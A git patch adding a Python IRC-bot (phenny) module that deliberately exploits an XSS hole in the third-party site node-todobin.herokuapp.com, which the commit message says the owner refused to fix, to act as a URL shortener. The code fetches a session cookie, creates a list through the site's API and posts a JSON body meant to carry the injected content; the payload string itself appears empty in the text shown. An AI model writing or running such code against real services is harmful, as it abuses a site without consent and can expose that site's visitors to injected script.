From eba2e5b8a36dcb543053ed669f81e12006c4e95d Mon Sep 17 00:00:00 2001 From: Calvin Winkowski Date: Sun, 12 Feb 2012 04:32:16 -0500 Subject: [PATCH] Added url shortener using xss vulnerablity that owner refused to fix. --- modules/node-todo.py | 69 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 modules/node-todo.py diff --git a/modules/node-todo.py b/modules/node-todo.py new file mode 100644 index 0000000..d110adb --- /dev/null +++ b/modules/node-todo.py @@ -0,0 +1,69 @@ +#!/usr/bin/python3 +""" +node-todo.py - node-todo uploader +author: mutantmonkey +author: telnoratti +""" + +from urllib.error import HTTPError +from urllib import request +import web +import json + +def xss(phenny, input): + """.xss - Upload a URL to an XSS vulnerability in node-todobin.herokuapp.com.""" + + url = input.group(2) + if not url: + phenny.reply("No URL provided.") + return + + if not url.startswith('http'): + url = ''.join(['http://', url]) + + try: + url = urlshortener(url) + except (HTTPError, IOError): + phenny.reply("THE INTERNET IS FUCKING BROKEN. Please try again later.") + return + + phenny.reply(url) +xss.rule = (['xss'], r'(.*)') + + + +def urlshortener(longurl): + xss = ''.join(["""{"status":false,"text":""}"""]) + xss = xss.encode() + r = request.urlopen('http://node-todobin.herokuapp.com/list') + cookie = r.info().get('Set-Cookie').partition('=')[2].partition(';')[0] + + r = request.Request('http://node-todobin.herokuapp.com/api/todos', + headers={ + 'Content-Type': 'application/json', + 'Accept': 'application/json, text/javascript, */*', + 'Cookie': cookie, + }, data=b'{"id":null}') + opener = request.build_opener(request.HTTPHandler) + response = opener.open(r) + data = response.read() + js = json.loads(data.decode('utf-8')) + uri = js.get('uri') + url = '/'.join(['http://node-todobin.herokuapp.com/api/todos', uri]) + newurl = '/'.join(['http://node-todobin.herokuapp.com/list', uri]) + + request.urlopen(url) + request.urlopen(newurl) + r = request.Request(url, + headers={ + 'Content-Type': 'application/json', + 'Accept': 'application/json, text/javascript, */*', + 'Cookie': cookie, + }, data=xss) + + opener.open(r) + + return newurl + +if __name__ == '__main__': + print(__doc__.strip())